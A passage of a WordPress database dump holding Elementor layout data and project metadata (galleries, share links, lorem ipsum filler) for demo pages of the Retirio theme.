industry.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e228a97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":40},\"elements\":[{\"id\":\"ab36771\",\"elType\":\"widget\",\"settings\":{\"item_padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":false},\"item_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"015\",\"left\":\"015\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_elementor_data_project\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96bd9a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ea6b0ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"103fd8d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Before\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"84cdfaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"651e2be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"511b8d6\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"ba13071\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a21bde\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e07fdc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image.jpg\",\"id\":217,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"371f27c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"57\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bf6cd47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0d63b10\",\"elType\":\"widget\",\"settings\":{\"title\":\"After\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d81044d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0aee7db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Results\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f175404\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9ea358c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31a15cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7d872da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-2.jpg\",\"id\":230,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53c42ec\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7a47171\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fa8ab1a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our gallery\",\"title\":\" Photo gallery\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"8a40fc1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_photo_gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(2143,4640,'_elementor_page_assets','a:0:{}'),(2144,4640,'_thumbnail_id','1156'),(2145,4640,'_wxr_import_has_attachment_refs','1'),(2146,4641,'ova_project_gallery','a:3:{i:589;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\";i:590;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\";i:591;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\";}'),(2147,4641,'ova_project_service','Interior design'),(2148,4641,'ova_project_architect','Mike hardson'),(2149,4641,'ova_project_duration','4.5 Months'),(2150,4641,'ova_project_location','Broklyn, New York'),(2151,4641,'_elementor_edit_mode','builder'),(2152,4641,'_elementor_template_type','wp-post'),(2153,4641,'_elementor_version','3.6.6'),(2154,4641,'ova_project_group_icon','a:4:{i:0;a:2:{s:29:\"ova_project_class_icon_social\";s:14:\"fab fa-twitter\";s:23:\"ova_project_link_social\";s:86:\"https://twitter.com/share?url=https://demo.ovatheme.com/retirio/project/idea-interior/\";}i:1;a:2:{s:29:\"ova_project_class_icon_social\";s:15:\"fab fa-facebook\";s:23:\"ova_project_link_social\";s:93:\"http://www.facebook.com/sharer.php?u=https://demo.ovatheme.com/retirio/project/idea-interior/\";}i:2;a:2:{s:29:\"ova_project_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:23:\"ova_project_link_social\";s:101:\"https://pinterest.com/pin/create/button/?url=https://demo.ovatheme.com/retirio/project/idea-interior/\";}i:3;a:2:{s:29:\"ova_project_class_icon_social\";s:16:\"fab fa-instagram\";s:23:\"ova_project_link_social\";s:87:\"https://www.instagram.com/?url=https://demo.ovatheme.com/retirio/project/idea-interior/\";}}'),(2155,4641,'_wp_page_template','default'),(2156,4641,'_elementor_data','[{\"id\":\"73dfd34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"d61f611\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":60},\"elements\":[{\"id\":\"37265f2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Idea interior\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"900\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b80d2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"typography_typography\":\"custom\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9eb6ca4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates\",\"header_size\":\"h4\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c1f2c5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e228a97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":40},\"elements\":[{\"id\":\"ab36771\",\"elType\":\"widget\",\"settings\":{\"item_padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":false},\"item_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"015\",\"left\":\"015\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_elementor_data_project\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96bd9a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ea6b0ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"103fd8d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Before\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"84cdfaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"651e2be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"511b8d6\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"ba13071\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a21bde\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e07fdc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image.jpg\",\"id\":217,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"371f27c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"57\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bf6cd47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0d63b10\",\"elType\":\"widget\",\"settings\":{\"title\":\"After\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d81044d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0aee7db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Results\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f175404\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9ea358c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31a15cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7d872da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-2.jpg\",\"id\":230,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53c42ec\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7a47171\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fa8ab1a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our gallery\",\"title\":\" Photo gallery\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"8a40fc1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_photo_gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(2157,4641,'_elementor_page_assets','a:0:{}'),(2158,4641,'_thumbnail_id','1158'),(2159,4641,'_wxr_import_has_attachment_refs','1'),(2160,4642,'ova_project_gallery','a:3:{i:589;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\";i:590;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\";i:591;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\";}'),(2161,4642,'ova_project_service','Interior design'),(2162,4642,'ova_project_architect','Mike hardson'),(2163,4642,'ova_project_duration','4.5 Months'),(2164,4642,'ova_project_location','Broklyn, New York'),(2165,4642,'_elementor_edit_mode','builder'),(2166,4642,'_elementor_template_type','wp-post'),(2167,4642,'_elementor_version','3.6.6'),(2168,4642,'ova_project_group_icon','a:4:{i:0;a:2:{s:29:\"ova_project_class_icon_social\";s:14:\"fab fa-twitter\";s:23:\"ova_project_link_social\";s:82:\"https://twitter.com/share?url=https://demo.ovatheme.com/retirio/project/buildings/\";}i:1;a:2:{s:29:\"ova_project_class_icon_social\";s:15:\"fab fa-facebook\";s:23:\"ova_project_link_social\";s:89:\"http://www.facebook.com/sharer.php?u=https://demo.ovatheme.com/retirio/project/buildings/\";}i:2;a:2:{s:29:\"ova_project_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:23:\"ova_project_link_social\";s:97:\"https://pinterest.com/pin/create/button/?url=https://demo.ovatheme.com/retirio/project/buildings/\";}i:3;a:2:{s:29:\"ova_project_class_icon_social\";s:16:\"fab fa-instagram\";s:23:\"ova_project_link_social\";s:83:\"https://www.instagram.com/?url=https://demo.ovatheme.com/retirio/project/buildings/\";}}'),(2169,4642,'_wp_page_template','default'),(2170,4642,'_elementor_data','[{\"id\":\"73dfd34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"d61f611\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":60},\"elements\":[{\"id\":\"37265f2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Buildings\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"900\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b80d2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"typography_typography\":\"custom\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9eb6ca4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates\",\"header_size\":\"h4\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c1f2c5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e228a97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":40},\"elements\":[{\"id\":\"ab36771\",\"elType\":\"widget\",\"settings\":{\"item_padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":false},\"item_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"015\",\"left\":\"015\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_elementor_data_project\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96bd9a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ea6b0ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"103fd8d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Before\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"84cdfaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"651e2be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"511b8d6\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas 